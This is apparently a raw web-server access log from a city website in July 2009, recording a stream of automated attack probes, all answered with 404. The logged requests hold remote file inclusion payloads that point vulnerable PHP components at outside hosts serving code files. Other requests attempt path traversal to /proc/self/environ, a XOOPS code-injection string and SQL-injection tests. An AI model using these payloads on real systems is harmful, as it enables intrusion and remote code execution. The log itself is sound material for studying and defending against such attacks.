124.0.145.1 - - [01/Jul/2009:10:38:37 -0700] "GET /logs/access_080531.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:10:38:38 -0700] "GET /logs/access.log//index.php?p=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:10:38:38 -0700] "GET /index.php?p=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.22 - - [01/Jul/2009:10:38:38 -0700] "GET /logs//index.php?p=http://aneh.ucoz.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.86.175.194 - - [01/Jul/2009:10:39:03 -0700] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:43:20 -0700] "GET /logs/access_081001.log%20%20/page.php?p=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:43:20 -0700] "GET /page.php?p=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:10:43:21 -0700] "GET /logs/page.php?p=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:10:51:02 -0700] "GET /page.php?ln=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:10:51:02 -0700] "GET /logs/page.php?ln=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:10:51:02 -0700] "GET /logs/access_080531.log/page.php?ln=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:10:53:49 -0700] "GET /logs/access_080531.log/page.php?ln=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:10:53:49 -0700] "GET /logs/page.php?ln=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:10:53:50 -0700] "GET /page.php?ln=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:10:55:25 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:10:55:27 -0700] "GET /logs/access_081101.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:10:55:27 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
38.99.44.103 - - [01/Jul/2009:10:56:47 -0700] "GET /logs/access_090301.log HTTP/1.0" 200 1769472 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:03:05 -0700] "GET /logs/access_081001.log%20%20/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:03:05 -0700] "GET /convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:03:06 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.220.101.136 - - [01/Jul/2009:11:09:39 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "cityofarkadelphia.com"
67.220.101.136 - - [01/Jul/2009:11:09:39 -0700] "GET / HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "cityofarkadelphia.com"
67.220.101.136 - - [01/Jul/2009:11:09:40 -0700] "GET / HTTP/1.1" 200 917 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:36 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:36 -0700] "GET /logs/access_080531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:36 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /logs/access_080531.log/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /logs/access_080531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
91.195.124.16 - - [01/Jul/2009:11:12:37 -0700] "GET /logs/access_080531.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:13:45 -0700] "GET /include/lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:13:45 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:13:46 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:11:20:03 -0700] "GET /citywriter/head.php?path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:21:33 -0700] "GET /logs/access.log//components/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.135.42.164 - - [01/Jul/2009:11:21:34 -0700] "GET /logs/access.log//login.php?dir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
66.135.42.164 - - [01/Jul/2009:11:21:34 -0700] "GET /logs//login.php?dir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
66.135.42.164 - - [01/Jul/2009:11:21:34 -0700] "GET /login.php?dir=http://www.zymes.gr/mimisan/ID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:21:35 -0700] "GET /components/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:21:35 -0700] "GET /logs//components/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:22:12 -0700] "GET /logs/access_080330.log//components/errors.php?error=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:11:23:21 -0700] "GET /logs/access_080330.log//citywriter/head.php?path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:11:23:21 -0700] "GET /citywriter/head.php?path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:11:23:21 -0700] "GET /logs//citywriter/head.php?path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.106.249.217 - - [01/Jul/2009:11:29:10 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.249.217 - - [01/Jul/2009:11:29:10 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.249.217 - - [01/Jul/2009:11:29:10 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:11:30:23 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:11:30:24 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.206.120.187 - - [01/Jul/2009:11:30:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:11:32:37 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:11:32:37 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:11:32:37 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:33:09 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:33:09 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:33:09 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.249.217 - - [01/Jul/2009:11:33:33 -0700] "GET /logs/access_080531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:34:14 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:34:14 -0700] "GET /skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:34:14 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:34:15 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:34:15 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:34:15 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.scoringsessions.com///img/large/2006/missionimpossible3/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:34:26 -0700] "GET /logs/access_080330.log/skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:11:35:14 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:11:35:14 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:11:35:14 -0700] "GET /logs/access_080601.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:11:35:15 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:11:35:15 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
60.43.229.5 - - [01/Jul/2009:11:35:15 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:36:05 -0700] "GET /logs/access_080601.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:36:05 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:36:05 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
193.243.139.4 - - [01/Jul/2009:11:36:27 -0700] "GET /logs/access_080531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:36:32 -0700] "GET /logs/access.log%20%20/skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.98.222.18 - - [01/Jul/2009:11:36:40 -0700] "GET /logs/access_080330.log%20%20/skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:38:06 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:38:06 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:38:06 -0700] "GET /logs/access_080601.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:11:38:17 -0700] "GET /logs/access_080601.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:11:38:27 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.16.16.225 - - [01/Jul/2009:11:38:37 -0700] "GET /logs/access.log/error.php?dir=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.16.16.225 - - [01/Jul/2009:11:38:37 -0700] "GET /error.php?dir=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
217.16.16.225 - - [01/Jul/2009:11:38:37 -0700] "GET /logs/error.php?dir=http://www.telso.com/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.32.106.32 - - [01/Jul/2009:11:39:02 -0700] "GET /logs/access_080801.log//citywriter/head.php?path=http://www.haruuu.com/albanianid.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:11:39:53 -0700] "GET /error.php?dir=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:11:39:53 -0700] "GET /logs/access.log/error.php?dir=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:11:39:54 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:11:39:54 -0700] "GET /logs/access_080601.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:11:39:54 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:11:39:56 -0700] "GET /logs/error.php?dir=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:11:40:20 -0700] "GET /logs/access_080330.log/error.php?dir=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:41:33 -0700] "GET /logs/access.log/error.php?dir=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:41:34 -0700] "GET /error.php?dir=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:41:34 -0700] "GET /logs/error.php?dir=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.189.9.115 - - [01/Jul/2009:11:41:55 -0700] "GET /Produkt.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
213.189.9.115 - - [01/Jul/2009:11:41:57 -0700] "GET /Produkt.php?id=' HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:11:42:31 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:42:41 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:11:42:51 -0700] "GET /logs/access_080531.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
211.115.206.114 - - [01/Jul/2009:11:43:54 -0700] "GET /logs/access_080330.log/error.php?dir=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
200.74.143.62 - - [01/Jul/2009:11:45:06 -0700] "GET /Produkt.php?id=' HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:45:39 -0700] "GET /logs/access_080601.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:11:46:12 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:11:46:12 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.165.73.157 - - [01/Jul/2009:11:46:12 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanri.org/HCboard/data/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:46:16 -0700] "GET /logs/access_080601.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.207.160.102 - - [01/Jul/2009:11:46:27 -0700] "GET /logs/access_081001.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.77.32.217 - - [01/Jul/2009:11:46:43 -0700] "GET /logs/access_080601.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
